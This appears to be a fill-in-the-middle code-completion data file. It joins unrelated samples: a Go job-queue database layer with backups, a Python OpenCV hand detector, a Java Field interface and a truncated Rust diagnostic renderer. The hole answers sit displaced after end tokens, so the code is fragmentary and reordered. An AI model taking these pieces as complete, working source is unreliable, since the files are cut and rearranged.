0 { errf = bo.Put(key, stdo) } if len(stde) > 0 { errf = be.Put(key, stde) } } if errf != nil { return errf } switch jfr { case FailReasonRAM: b := tx.Bucket(bucketJobRAM) errf = b.Put([]byte(fmt.Sprintf("%s%s%20d", jrg, dbDelimiter, jpr)), []byte(strconv.Itoa(jpr))) case FailReasonDisk: b := tx.Bucket(bucketJobDisk) errf = b.Put([]byte(fmt.Sprintf("%s%s%20d", jrg, dbDelimiter, jpd)), []byte(strconv.Itoa(int(jpd)))) case FailReasonTime: b := tx.Bucket(bucketJobSecs) errf = b.Put([]byte(fmt.Sprintf("%s%s%20d", jrg, dbDelimiter, secs)), []byte(strconv.Itoa(secs))) } return errf }) db.wg.Done(wgk) if err != nil { clog.Error(ctx, "Database operation updateJobAfterExit failed", "err", err) } db.Lock() db.updatingAfterJobExit-- db.Unlock() }() } // updateJobAfterChange rewrites the job's entry in the live bucket, to enable // complete recovery after a crash. This happens in a goroutine, since it isn't // essential this happens, and we benefit from the speed. func (db *db) updateJobAfterChange(ctx context.Context, job *Job) { var encoded []byte enc := codec.NewEncoderBytes(&encoded, db.ch) db.RLock() defer db.RUnlock() if db.closed { return } key := []byte(job.Key()) job.RLock() err := enc.Encode(job) job.RUnlock() if err != nil { clog.Error(ctx, "Database operation updateJobAfterChange failed due to Encode failure", "err", err) return } db.wgMutex.Lock() defer db.wgMutex.Unlock() wgk := db.wg.Add(1) go func() { defer internal.LogPanic(ctx, "updateJobAfterChange", true) err := db.bolt.Batch(func(tx *bolt.Tx) error { bjl := tx.Bucket(bucketJobsLive) if bjl.Get(key) == nil { // it's possible for these batches to be interleaved with // archiveJob batches, and for this batch to update that a job // was started to actually execute after the batch that says the // job completed, removing it from the live bucket. In that // case, don't add it back to the live bucket here. return nil } return bjl.Put(key, encoded) }) db.wg.Done(wgk) if err != nil { clog.Error(ctx, "Database operation updateJobAfterChange failed", "err", err) return } db.backgroundBackup(ctx) }() } // modifyLiveJobs is for use if jobs currently in the queue are modified such // that their Key() changes, or their dependencies or dependency groups change. // We simply remove all reference to the old keys in the lookup buckets, as well // as the old jobs from the live bucket, and then do the equivalent of // storeNewJobs() on the supplied new version of the jobs. (This is all done in // one transaction, so won't leave things in a bad state if interuppted half // way.) // The order of oldKeys should match the order or new jobs. Ie. oldKeys[0] is // the old Key() of jobs[0]. This is so that any stdout/err of old jobs is // associated with the new jobs. func (db *db) modifyLiveJobs(ctx context.Context, oldKeys []string, jobs []*Job) error { encodedJobs, rgLookups, dgLookups, rdgLookups, rgs, _, _, _, err := db.prepareNewJobs(jobs, false) if err != nil { return err } sort.Sort(rgLookups) sort.Sort(rgs) sort.Sort(dgLookups) sort.Sort(rdgLookups) sort.Sort(encodedJobs) lookupBuckets := [][]byte{bucketRTK, bucketDTK, bucketRDTK} err = db.bolt.Batch(func(tx *bolt.Tx) error { // delete old jobs and their lookups newJobBucket := tx.Bucket(bucketJobsLive) bo := tx.Bucket(bucketStdO) be := tx.Bucket(bucketStdE) os := make([][]byte, len(oldKeys)) es := make([][]byte, len(oldKeys)) var hadStd bool for i, oldKey := range oldKeys { suffix := []byte(dbDelimiter + oldKey) for _, bucket := range lookupBuckets { b := tx.Bucket(bucket) // *** currently having to go through the the whole lookup // buckets; if this is a noticeable performance issue, will have // to implement a reverse lookup... errf := b.ForEach(func(k, v []byte) error { if bytes.HasSuffix(k, suffix) { errd := b.Delete(k) if errd != nil { return errd } } return nil }) if errf != nil { return errf } } key := []byte(oldKey) errd := newJobBucket.Delete(key) if errd != nil { return errd } o := bo.Get(key) if o != nil { os[i] = o errd = bo.Delete(key) if errd != nil { return errd } hadStd = true } e := be.Get(key) if e != nil { es[i] = e errd = be.Delete(key) if errd != nil { return errd } hadStd = true } } if len(encodedJobs) > 0 { // now go ahead and store the new lookups and jobs errs := db.putLookups(tx, bucketRTK, rgLookups) if errs != nil { return errs } if len(rgs) > 0 { errs = db.putLookups(tx, bucketRGs, rgs) if errs != nil { return errs } } if len(dgLookups) > 0 { errs = db.putLookups(tx, bucketDTK, dgLookups) if errs != nil { return errs } } if len(rdgLookups) > 0 { errs = db.putLookups(tx, bucketRDTK, rdgLookups) if errs != nil { return errs } } if hadStd { for i, job := range jobs { if os[i] != nil { errs = bo.Put([]byte(job.Key()), os[i]) if errs != nil { return errs } } if es[i] != nil { errs = be.Put([]byte(job.Key()), es[i]) if errs != nil { return errs } } } } return db.putEncodedJobs(tx, bucketJobsLive, encodedJobs) } return nil }) if err != nil { clog.Error(ctx, "Database error during modify", "err", err) } go db.backgroundBackup(ctx) return err } // retrieveJobStd gets the values that were stored using updateJobStd() for the // given job. func (db *db) retrieveJobStd(ctx context.Context, jobkey string) (stdo []byte, stde []byte) { // first wait for any existing updateJobAfterExit() calls to complete //*** this method of waiting seems really bad and should be improved, but in // practice we probably never wait for { db.RLock() if db.updatingAfterJobExit == 0 { db.RUnlock() break } db.RUnlock() <-time.After(10 * time.Millisecond) } err := db.bolt.View(func(tx *bolt.Tx) error { bo := tx.Bucket(bucketStdO) be := tx.Bucket(bucketStdE) key := []byte(jobkey) o := bo.Get(key) if o != nil { stdo = make([]byte, len(o)) copy(stdo, o) } e := be.Get(key) if e != nil { stde = make([]byte, len(e)) copy(stde, e) } return nil }) if err != nil { // impossible, but to keep the linter happy and incase things change in // the future clog.Error(ctx, "Database retrieve failed", "err", err) } return stdo, stde } // recommendedReqGroupMemory returns the 95th percentile peak memory usage of // all jobs that previously ran with the given reqGroup. If there are too few // prior values to calculate a 95th percentile, or if the 95th percentile is // very close to the maximum value, returns the maximum value instead. In either // case, the true value is rounded up to the nearest 100 MB. Returns 0 if there // are no prior values. func (db *db) recommendedReqGroupMemory(reqGroup string) (int, error) { return db.recommendedReqGroupStat(bucketJobRAM, reqGroup, RecMBRound) } // recommendedReqGroupDisk returns the 95th percentile peak disk usage of // all jobs that previously ran with the given reqGroup. If there are too few // prior values to calculate a 95th percentile, or if the 95th percentile is // very close to the maximum value, returns the maximum value instead. In either // case, the true value is rounded up to the nearest 100 MB. Returns 0 if there // are no prior values. func (db *db) recommendedReqGroupDisk(reqGroup string) (int, error) { return db.recommendedReqGroupStat(bucketJobDisk, reqGroup, RecMBRound) } // recommendReqGroupTime returns the 95th percentile wall time taken of all jobs // that previously ran with the given reqGroup. If there are too few prior // values to calculate a 95th percentile, or if the 95th percentile is very // close to the maximum value, returns the maximum value instead. In either // case, the true value is rounded up to the nearest second. Returns 0 if there // are no prior values. func (db *db) recommendedReqGroupTime(reqGroup string) (int, error) { return db.recommendedReqGroupStat(bucketJobSecs, reqGroup, RecSecRound) } // recommendedReqGroupStat is the implementation for the other recommend*() // methods. func (db *db) recommendedReqGroupStat(statBucket []byte, reqGroup string, roundAmount int) (int, error) { prefix := []byte(reqGroup) max := 0 var recommendation int err := db.bolt.View(func(tx *bolt.Tx) error { c := tx.Bucket(statBucket).Cursor() // we seek over the bucket, and to avoid having to do it twice (first to // get the overall count, then to get the 95th percentile), we keep the // previous 5%-sized window of values, updating recommendation as the // window fills count := 0 window := jobStatWindowPercent var prev []int var erra error for k, v := c.Seek(prefix); bytes.HasPrefix(k, prefix); k, v = c.Next() { max, erra = strconv.Atoi(string(v)) if erra != nil { return erra } count++ if count > 100 { window = (float32(count) / 100) * jobStatWindowPercent } prev = append(prev, max) if float32(len(prev)) > window { recommendation, prev = prev[0], prev[1:] } } return nil }) if err != nil { return 0, err } if recommendation == 0 { if max == 0 { return recommendation, err } recommendation = max } if max-recommendation < roundAmount { recommendation = max } if recommendation < roundAmount { recommendation = roundAmount } if recommendation%roundAmount > 0 { recommendation = int(math.Ceil(float64(recommendation)/float64(roundAmount))) * roundAmount } return recommendation, err } // store does a basic set of a key/val in a given bucket func (db *db) store(bucket []byte, key string, val []byte) error { err := db.bolt.Batch(func(tx *bolt.Tx) error { b := tx.Bucket(bucket) err := b.Put([]byte(key), val) return err }) return err } // retrieve does a basic get of a key from a given bucket. An error isn't // possible here. func (db *db) retrieve(ctx context.Context, bucket []byte, key string) []byte { var val []byte err := db.bolt.View(func(tx *bolt.Tx) error { b := tx.Bucket(bucket) v := b.Get([]byte(key)) if v != nil { val = make([]byte, len(v)) copy(val, v) } return nil }) if err != nil { // impossible, but to keep the linter happy and incase things change in // the future clog.Error(ctx, "Database retrieve failed", "err", err) } return val } // remove does a basic delete of a key from a given bucket. We don't care about // errors here. func (db *db) remove(ctx context.Context, bucket []byte, key string) { db.wgMutex.Lock() defer db.wgMutex.Unlock() wgk := db.wg.Add(1) go func() { defer internal.LogPanic(ctx, "jobqueue database remove", true) defer db.wg.Done(wgk) err := db.bolt.Batch(func(tx *bolt.Tx) error { b := tx.Bucket(bucket) return b.Delete([]byte(key)) }) if err != nil { clog.Error(ctx, "Database remove failed", "err", err) } }() } // storeBatched stores items in the db in batches for efficiency. bucket is the // name of the bucket to store in. func (db *db) storeBatched(bucket []byte, data sobsd, storer sobsdStorer) error { // we want to add in batches of size data/10, minimum 1000, rounded to // the nearest 1000 num := len(data) batchSize := num / 10 rem := batchSize % 1000 if rem > 500 { batchSize = batchSize - rem + 1000 } else { batchSize -= rem } if batchSize < 1000 { batchSize = 1000 } // based on https://github.com/boltdb/bolt/issues/337#issue-64861745 if num < batchSize { return storer(bucket, data) } batches := num / batchSize offset := num - (num % batchSize) for i := 0; i < batches; i++ { err := storer(bucket, data[i*batchSize:(i+1)*batchSize]) if err != nil { return err } } if offset != 0 { err := storer(bucket, data[offset:]) if err != nil { return err } } return nil } // storeLookups is a sobsdStorer for storing Job.[somevalue]->Job.Key() lookups // in the db. func (db *db) storeLookups(bucket []byte, lookups sobsd) error { err := db.bolt.Batch(func(tx *bolt.Tx) error { return db.putLookups(tx, bucket, lookups) }) return err } // putLookups does the work of storeLookups(). You must be inside a bolt // transaction when calling this. func (db *db) putLookups(tx *bolt.Tx, bucket []byte, lookups sobsd) error { lookup := tx.Bucket(bucket) for _, doublet := range lookups { err := lookup.Put(doublet[0], nil) if err != nil { return err } } return nil } // storeEncodedJobs is a sobsdStorer for storing Jobs in the db. func (db *db) storeEncodedJobs(bucket []byte, encodes sobsd) error { err := db.bolt.Batch(func(tx *bolt.Tx) error { return db.putEncodedJobs(tx, bucket, encodes) }) return err } // putEncodedJobs does the work of storeEncodedJobs(). You nust be inside a bolt // transaction when calling this. func (db *db) putEncodedJobs(tx *bolt.Tx, bucket []byte, encodes sobsd) error { bjobs := tx.Bucket(bucket) for _, doublet := range encodes { err := bjobs.Put(doublet[0], doublet[1]) if err != nil { return err } } return nil } // close shuts down the db, should be used prior to exiting. Ensures any // ongoing backgroundBackup() completes first (but does not wait for backup() to // complete). func (db *db) close(ctx context.Context) error { db.Lock() defer db.Unlock() if !db.closed { db.closed = true // before actually closing, wait for any go routines doing database // transactions to complete if db.backingUp { db.backupFinal = true close(db.backupStopWait) db.Unlock() <-db.backupNotification db.wgMutex.Lock() db.wg.Wait(dbRunningTransactionsWaitTime) db.wgMutex.Unlock() db.Lock() } else { db.Unlock() db.wgMutex.Lock() db.wg.Wait(dbRunningTransactionsWaitTime) db.wgMutex.Unlock() db.Lock() } // do a final backup if db.backupsEnabled && db.backupQueued { clog.Debug(ctx, "Jobqueue database not backed up, will do final backup") db.backupToBackupFile(ctx, false) } err := db.bolt.Close() if db.backupMount != nil { erru := db.backupMount.Unmount() if erru != nil { if err == nil { err = erru } else { err = fmt.Errorf("%s (and unmounting backup failed: %s)", err.Error(), erru) } } } return err } return nil } // backgroundBackup backs up the database to a file (the location given during // initDB()) in a goroutine, doing one backup at a time and queueing a further // backup if any other backup requests come in while a backup is running. Any // errors are silently ignored. Spaces out sequential backups so that there is a // gap of max(30s, [time taken to complete previous backup]) seconds between // them. func (db *db) backgroundBackup(ctx context.Context) { db.Lock() defer db.Unlock() if db.closed || !db.backupsEnabled { return } if db.backingUp { db.backupQueued = true return } db.backingUp = true slowBackups := db.slowBackups go func(last time.Time, wait time.Duration, doNotWait bool) { defer internal.LogPanic(ctx, "backgroundBackup", true) if !doNotWait { now := time.Now() if !last.IsZero() && last.Add(wait).After(now) { // wait before doing another backup, so we don't slow down new // db accessses all the time select { case <-time.After(last.Add(wait).Sub(now)): break case <-db.backupStopWait: break } } } if slowBackups { // just for testing purposes <-time.After(100 * time.Millisecond) } start := time.Now() db.backupToBackupFile(ctx, slowBackups) db.Lock() db.backingUp = false db.backupLast = time.Now() duration := time.Since(start) if duration > minimumTimeBetweenBackups { db.backupWait = duration } if db.backupFinal { // close() has been called, don't do any more backups and tell // close() we finished our backup db.backupFinal = false db.backupStopWait = make(chan bool) db.Unlock() db.backupNotification <- true return } if db.backupQueued { db.backupQueued = false db.Unlock() db.backgroundBackup(ctx) } else { db.Unlock() } }(db.backupLast, db.backupWait, db.backupFinal) } // backupToBackupFile is used by backgroundBackup() and close() to do the actual // backup. func (db *db) backupToBackupFile(ctx context.Context, slowBackups bool) { // we most likely triggered this backup immediately following an operation // that alters (the important parts of) the database; wait for those // transactions to actually complete before backing up db.wgMutex.Lock() db.wg.Wait(dbRunningTransactionsWaitTime) wgk := db.wg.Add(1) db.wgMutex.Unlock() defer db.wg.Done(wgk) // create the new backup file with temp name tmpBackupPath := db.backupPathTmp err := db.bolt.View(func(tx *bolt.Tx) error { return tx.CopyFile(tmpBackupPath, dbFilePermission) }) if slowBackups { <-time.After(100 * time.Millisecond) } if err != nil { clog.Error(ctx, "Database backup failed", "err", err) // if it failed, delete any partial file that got made errr := os.Remove(tmpBackupPath) if errr != nil && !os.IsNotExist(errr) { clog.Warn(ctx, "Removing bad database backup file failed", "path", tmpBackupPath, "err", errr) } } else { // backup succeeded if db.s3accessor != nil { // upload to s3 then delete it errr := db.s3accessor.UploadFile(tmpBackupPath, db.backupPath, "application/octet-stream") if errr != nil { clog.Warn(ctx, "Uploading new database backup file to S3 failed", "source", tmpBackupPath, "dest", db.backupPath, "err", errr) } errr = os.Remove(tmpBackupPath) if errr != nil { clog.Warn(ctx, "failed to delete temporary backup file after uploading to s3", "path", tmpBackupPath, "err", errr) } } else { // move it over any old backup errr := os.Rename(tmpBackupPath, db.backupPath) if errr != nil { clog.Warn(ctx, "Renaming new database backup file failed", "source", tmpBackupPath, "dest", db.backupPath, "err", errr) } } } } // backup backs up the database to the given writer. Can be called at the same // time as an active backgroundBackup() or even another backup(). You will get // a consistent view of the database at the time you call this. NB: this can be // interrupted by calling db.close(). func (db *db) backup(w io.Writer) error { db.RLock() if db.closed { db.RUnlock() return fmt.Errorf("database closed") } db.RUnlock() return db.bolt.View(func(tx *bolt.Tx) error { _, txErr := tx.WriteTo(w) return txErr }) } // stripBucketFromS3Path removes the first directory from the given path. If // there are no directories, returns an error. func stripBucketFromS3Path(path string) (string, error) { if idx := strings.IndexByte(path, '/'); idx >= 0 { return path[idx+1:], nil } return "", Error{Err: ErrS3DBBackupPath} }<|fim▁end|>
// value may come from the cache, avoiding db access.
<|file_name|>mti880.py<|end_file_name|><|fim▁begin|>#! /usr/bin/env python # Copyright (C) 2012 Club Capra - capra.etsmtl.ca # # This file is part of CapraVision. # # CapraVision is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import cv2 import cv2.cv as cv import numpy as np from CapraVision.server.filters.parameter import Parameter from CapraVision.server.filters.dataextract import DataExtractor class MTI880(DataExtractor): def __init__(self): DataExtractor.__init__(self) self.hue_min = 113 self.hue_max = 255 self.area_min = 600 self.normal_hand = 0 self.extended_hand = 0 self.closed_hand = 0 self.amplitude = 0 self._capture_normal_hand = False self._capture_extended_hand = False self._capture_closed_hand = False self._calibrate_hue = False self.accumulate = [] self.observers = [] def add_observer(self, observer): self.observers.append(observer) def remove_observer(self, observer): self.observers.remove(observer) def notify_observers(self): for obs in self.observers: obs() def execute(self, image): image = cv2.cvtColor(image, cv2.cv.CV_BGR2HSV) h, _, _ = cv2.split(image) image[h < self.hue_min] *= 0 image[h > self.hue_max] *= 0 #image[image > 0] = 255 gray = cv2.cvtColor(image, cv.CV_BGR2GRAY) cnt, _ = cv2.findContours(gray, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) image *= 0 area, c = self.detect_biggest_area(gray) if self._calibrate_hue and c is not None and area > self.area_min: self.hue_min += 1 #self.notify_observers() elif self._calibrate_hue and self.hue_min > 0: print self.hue_min self.notify_observers() self._calibrate_hue = False self.calibrate_closed_hand(area) self.calibrate_extended_hand(area) self.calibrate_normal_hand(area) if c is not None and area >= self.area_min: hull = cv2.convexHull(c) cv2.drawContours(image, [hull],-1, (255,255,255), -1) self.notify_output_observers(str(self.calc_return_value(area)) + "\n") else: self.notify_output_observers('0\n') return image def detect_biggest_area(self, gray): cnt, _ = cv2.findContours(gray, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) maxarea = 0 maxcnt = None for c in cnt: approx = cv2.approxPolyDP(c, 0, False) area = np.abs(cv2.contourArea(c)) if area > maxarea: maxarea = area maxcnt = c return (maxarea, maxcnt) def calibrate_normal_hand(self, area): if self._capture_normal_hand: self.accumulate.append(area) if len(self.accumulate) == 10: total = 0 for val in self.accumulate: total += val self._capture_normal_hand = False self.normal_hand = total / 10 self.accumulate = [] self.notify_observers() def calibrate_extended_hand(self, area): if self._capture_extended_hand: self.accumulate.append(area) if len(self.accumulate) == 10: total = 0 for val in self.accumulate: total += val self._capture_extended_hand = False self.extended_hand = total / 10 self.accumulate = [] self.notify_observers() def calibrate_closed_hand(self, area): if self._capture_closed_hand:<|fim▁hole|> if len(self.accumulate) == 10: total = 0 for val in self.accumulate: total += val self._capture_closed_hand = False self.closed_hand = total / 10 self.accumulate = [] self.notify_observers() def calc_return_value(self, area): if area > self.normal_hand: diff = (self.extended_hand - self.normal_hand) * (self.amplitude / 100.0) if area > (self.normal_hand + diff): return area else: return 0 else: diff = (self.normal_hand - self.closed_hand) * (self.amplitude / 100.0) if area < (self.normal_hand - diff): return -area else: return 0<|fim▁end|>
self.accumulate.append(area)
<|file_name|>Field.java<|end_file_name|><|fim▁begin|>package org.real2space.neumann.evaris.core.structure; /** * Project Neumann *<|fim▁hole|> * @version 0 * * created 2016/11/01 * added "extends Ring<F>" 2016/11/9 */ public interface Field<F> extends Ring<F> { /* * Multiply this member by an inverse of "other". */ public void divide (F other); /* * Returns an inverse of this member. */ public F inverse (); }<|fim▁end|>
* @author RealTwo-Space
<|file_name|>renderer.rs<|end_file_name|><|fim▁begin|>use std::io::{self, Write}; use std::ops::Range; use termcolor::{ColorSpec, WriteColor}; use crate::diagnostic::{LabelStyle, Severity}; use crate::files::{Error, Location}; use crate::term::{Chars, Config, Styles}; /// The 'location focus' of a source code snippet. pub struct Locus { /// The user-facing name of the file. pub name: String, /// The location. pub location: Location, } /// Single-line label, with an optional message. /// /// ```text /// ^^^^^^^^^ blah blah /// ``` pub type SingleLabel<'diagnostic> = (LabelStyle, Range<usize>, &'diagnostic str); /// A multi-line label to render. /// /// Locations are relative to the start of where the source code is rendered. pub enum MultiLabel<'diagnostic> { /// Multi-line label top. /// The contained value indicates where the label starts. /// /// ```text /// ╭────────────^ /// ``` /// /// Can also be rendered at the beginning of the line /// if there is only whitespace before the label starts. /// /// /// ```text /// ╭ /// ``` Top(usize), /// Left vertical labels for multi-line labels. /// /// ```text /// │ /// ``` Left, /// Multi-line label bottom, with an optional message. /// The first value indicates where the label ends. /// /// ```text /// ╰────────────^ blah blah /// ``` Bottom(usize, &'diagnostic str), } #[derive(Copy, Clone)] enum VerticalBound { Top, Bottom, } type Underline = (LabelStyle, VerticalBound); /// A renderer of display list entries. /// /// The following diagram gives an overview of each of the parts of the renderer's output: /// /// ```text /// ┌ outer gutter /// │ ┌ left border /// │ │ ┌ inner gutter /// │ │ │ ┌─────────────────────────── source ─────────────────────────────┐ /// │ │ │ │ │ /// ┌──────────────────────────────────────────────────────────────────────────── /// header ── │ error[0001]: oh noes, a cupcake has occurred! /// snippet start ── │ ┌─ test:9:0 /// snippet empty ── │ │ /// snippet line ── │ 9 │ ╭ Cupcake ipsum dolor. Sit amet marshmallow topping cheesecake /// snippet line ── │ 10 │ │ muffin. Halvah croissant candy canes bonbon candy. Apple pie jelly /// │ │ ╭─│─────────^ /// snippet break ── │ · │ │ /// snippet line ── │ 33 │ │ │ Muffin danish chocolate soufflé pastry icing bonbon oat cake. /// snippet line ── │ 34 │ │ │ Powder cake jujubes oat cake. Lemon drops tootsie roll marshmallow /// │ │ │ ╰─────────────────────────────^ blah blah /// snippet break ── │ · │ /// snippet line ── │ 38 │ │ Brownie lemon drops chocolate jelly-o candy canes. Danish marzipan /// snippet line ── │ 39 │ │ jujubes soufflé carrot cake marshmallow tiramisu caramels candy canes. /// │ │ │ ^^^^^^^^^^^^^^^^^^^ -------------------- blah blah /// │ │ │ │ /// │ │ │ blah blah /// │ │ │ note: this is a note /// snippet line ── │ 40 │ │ Fruitcake jelly-o danish toffee. Tootsie roll pastry cheesecake /// snippet line ── │ 41 │ │ soufflé marzipan. Chocolate bar oat cake jujubes lollipop pastry /// snippet line ── │ 42 │ │ cupcake. Candy canes cupcake toffee gingerbread candy canes muffin /// │ │ │ ^^^^^^^^^^^^^^^^^^ blah blah /// │ │ ╰──────────^ blah blah /// snippet break ── │ · /// snippet line ── │ 82 │ gingerbread toffee chupa chups chupa chups jelly-o cotton candy. /// │ │ ^^^^^^ ------- blah blah /// snippet empty ── │ │ /// snippet note ── │ = blah blah /// snippet note ── │ = blah blah blah /// │ blah blah /// snippet note ── │ = blah blah blah /// │ blah blah /// empty ── │ /// ``` /// /// Filler text from http://www.cupcakeipsum.com pub struct Renderer<'writer, 'config> { writer: &'writer mut dyn WriteColor, config: &'config Config, } impl<'writer, 'config> Renderer<'writer, 'config> { /// Construct a renderer from the given writer and config. pub fn new( writer: &'writer mut dyn WriteColor, config: &'config Config, ) -> Renderer<'writer, 'config> { Renderer { writer, config } } fn chars(&self) -> &'config Chars { &self.config.chars } fn styles(&self) -> &'config Styles { &self.config.styles } /// Diagnostic header, with severity, code, and message. /// /// ```text /// error[E0001]: unexpected type in `+` application /// ``` pub fn render_header( &mut self, locus: Option<&Locus>, severity: Severity, code: Option<&str>, message: &str, ) -> Result<(), Error> { // Write locus // // ```text // test:2:9: // ``` if let Some(locus) = locus { self.snippet_locus(locus)?; write!(self, ": ")?; } // Write severity name // // ```text // error // ``` self.set_color(self.styles().header(severity))?; match severity { Severity::Bug => write!(self, "bug")?, Severity::Error => write!(self, "error")?, Severity::Warning => write!(self, "warning")?, Severity::Help => write!(self, "help")?, Severity::Note => write!(self, "note")?, } // Write error code // // ```text // [E0001] // ``` if let Some(code) = &code.filter(|code| !code.is_empty()) { write!(self, "[{}]", code)?; } // Write diagnostic message // // ```text // : unexpected type in `+` application // ``` self.set_color(&self.styles().header_message)?; write!(self, ": {}", message)?; self.reset()?; writeln!(self)?; Ok(()) } /// Empty line. pub fn render_empty(&mut self) -> Result<(), Error> { writeln!(self)?; Ok(()) } /// Top left border and locus. /// /// ```text /// ┌─ test:2:9 /// ``` pub fn render_snippet_start( &mut self, outer_padding: usize, locus: &Locus, ) -> Result<(), Error> { self.outer_gutter(outer_padding)?; self.set_color(&self.styles().source_border)?; write!(self, "{}", self.chars().snippet_start)?; self.reset()?; write!(self, " ")?; self.snippet_locus(locus)?; writeln!(self)?; Ok(()) } /// A line of source code. /// /// ```text /// 10 │ │ muffin. Halvah croissant candy canes bonbon candy. Apple pie jelly /// │ ╭─│─────────^ /// ``` pub fn render_snippet_source( &mut self, outer_padding: usize, line_number: usize, source: &str, severity: Severity, single_labels: &[SingleLabel<'_>], num_multi_labels: usize, multi_labels: &[(usize, LabelStyle, MultiLabel<'_>)], ) -> Result<(), Error> { // Trim trailing newlines, linefeeds, and null chars from source, if they exist. // FIXME: Use the number of trimmed placeholders when rendering single line carets let source = source.trim_end_matches(['\n', '\r', '\0'].as_ref()); // Write source line // // ```text // 10 │ │ muffin. Halvah croissant candy canes bonbon candy. Apple pie jelly // ``` { // Write outer gutter (with line number) and border self.outer_gutter_number(line_number, outer_padding)?; self.border_left()?; // Write inner gutter (with multi-line continuations on the left if necessary) let mut multi_labels_iter = multi_labels.iter().peekable(); for label_column in 0..num_multi_labels { match multi_labels_iter.peek() { Some((label_index, label_style, label)) if *label_index == label_column => { match label { MultiLabel::Top(start) if *start <= source.len() - source.trim_start().len() => { self.label_multi_top_left(severity, *label_style)?; } MultiLabel::Top(..) => self.inner_gutter_space()?, MultiLabel::Left | MultiLabel::Bottom(..) => { self.label_multi_left(severity, *label_style, None)?; } } multi_labels_iter.next(); } Some((_, _, _)) | None => self.inner_gutter_space()?, } } // Write source text write!(self, " ")?; let mut in_primary = false; for (metrics, ch) in self.char_metrics(source.char_indices()) { let column_range = metrics.byte_index..(metrics.byte_index + ch.len_utf8()); // Check if we are overlapping a primary label let is_primary = single_labels.iter().any(|(ls, range, _)| { *ls == LabelStyle::Primary && is_overlapping(range, &column_range) }) || multi_labels.iter().any(|(_, ls, label)| { *ls == LabelStyle::Primary && match label { MultiLabel::Top(start) => column_range.start >= *start, MultiLabel::Left => true, MultiLabel::Bottom(start, _) => column_range.end <= *start, } }); // Set the source color if we are in a primary label if is_primary && !in_primary { self.set_color(self.styles().label(severity, LabelStyle::Primary))?; in_primary = true; } else if !is_primary && in_primary { self.reset()?; in_primary = false; } match ch { '\t' => (0..metrics.unicode_width).try_for_each(|_| write!(self, " "))?, _ => write!(self, "{}", ch)?, } } if in_primary { self.reset()?; } writeln!(self)?; } // Write single labels underneath source // // ```text // │ - ---- ^^^ second mutable borrow occurs here // │ │ │ // │ │ first mutable borrow occurs here // │ first borrow later used by call // │ help: some help here // ``` if !single_labels.is_empty() { // Our plan is as follows: // // 1. Do an initial scan to find: // - The number of non-empty messages. // - The right-most start and end positions of labels. // - A candidate for a trailing label (where the label's message<|fim▁hole|> // is printed to the left of the caret). // 2. Check if the trailing label candidate overlaps another label - // if so we print it underneath the carets with the other labels. // 3. Print a line of carets, and (possibly) the trailing message // to the left. // 4. Print vertical lines pointing to the carets, and the messages // for those carets. // // We try our best avoid introducing new dynamic allocations, // instead preferring to iterate over the labels multiple times. It // is unclear what the performance tradeoffs are however, so further // investigation may be required. // The number of non-empty messages to print. let mut num_messages = 0; // The right-most start position, eg: // // ```text // -^^^^---- ^^^^^^^ // │ // right-most start position // ``` let mut max_label_start = 0; // The right-most end position, eg: // // ```text // -^^^^---- ^^^^^^^ // │ // right-most end position // ``` let mut max_label_end = 0; // A trailing message, eg: // // ```text // ^^^ second mutable borrow occurs here // ``` let mut trailing_label = None; for (label_index, label) in single_labels.iter().enumerate() { let (_, range, message) = label; if !message.is_empty() { num_messages += 1; } max_label_start = std::cmp::max(max_label_start, range.start); max_label_end = std::cmp::max(max_label_end, range.end); // This is a candidate for the trailing label, so let's record it. if range.end == max_label_end { if message.is_empty() { trailing_label = None; } else { trailing_label = Some((label_index, label)); } } } if let Some((trailing_label_index, (_, trailing_range, _))) = trailing_label { // Check to see if the trailing label candidate overlaps any of // the other labels on the current line. if single_labels .iter() .enumerate() .filter(|(label_index, _)| *label_index != trailing_label_index) .any(|(_, (_, range, _))| is_overlapping(trailing_range, range)) { // If it does, we'll instead want to render it below the // carets along with the other hanging labels. trailing_label = None; } } // Write a line of carets // // ```text // │ ^^^^^^ -------^^^^^^^^^-------^^^^^----- ^^^^ trailing label message // ``` self.outer_gutter(outer_padding)?; self.border_left()?; self.inner_gutter(severity, num_multi_labels, multi_labels)?; write!(self, " ")?; let mut previous_label_style = None; let placeholder_metrics = Metrics { byte_index: source.len(), unicode_width: 1, }; for (metrics, ch) in self .char_metrics(source.char_indices()) // Add a placeholder source column at the end to allow for // printing carets at the end of lines, eg: // // ```text // 1 │ Hello world! // │ ^ // ``` .chain(std::iter::once((placeholder_metrics, '\0'))) { // Find the current label style at this column let column_range = metrics.byte_index..(metrics.byte_index + ch.len_utf8()); let current_label_style = single_labels .iter() .filter(|(_, range, _)| is_overlapping(range, &column_range)) .map(|(label_style, _, _)| *label_style) .max_by_key(label_priority_key); // Update writer style if necessary if previous_label_style != current_label_style { match current_label_style { None => self.reset()?, Some(label_style) => { self.set_color(self.styles().label(severity, label_style))?; } } } let caret_ch = match current_label_style { Some(LabelStyle::Primary) => Some(self.chars().single_primary_caret), Some(LabelStyle::Secondary) => Some(self.chars().single_secondary_caret), // Only print padding if we are before the end of the last single line caret None if metrics.byte_index < max_label_end => Some(' '), None => None, }; if let Some(caret_ch) = caret_ch { // FIXME: improve rendering of carets between character boundaries (0..metrics.unicode_width).try_for_each(|_| write!(self, "{}", caret_ch))?; } previous_label_style = current_label_style; } // Reset style if it was previously set if previous_label_style.is_some() { self.reset()?; } // Write first trailing label message if let Some((_, (label_style, _, message))) = trailing_label { write!(self, " ")?; self.set_color(self.styles().label(severity, *label_style))?; write!(self, "{}", message)?; self.reset()?; } writeln!(self)?; // Write hanging labels pointing to carets // // ```text // │ │ │ // │ │ first mutable borrow occurs here // │ first borrow later used by call // │ help: some help here // ``` if num_messages > trailing_label.iter().count() { // Write first set of vertical lines before hanging labels // // ```text // │ │ │ // ``` self.outer_gutter(outer_padding)?; self.border_left()?; self.inner_gutter(severity, num_multi_labels, multi_labels)?; write!(self, " ")?; self.caret_pointers( severity, max_label_start, single_labels, trailing_label, source.char_indices(), )?; writeln!(self)?; // Write hanging labels pointing to carets // // ```text // │ │ first mutable borrow occurs here // │ first borrow later used by call // │ help: some help here // 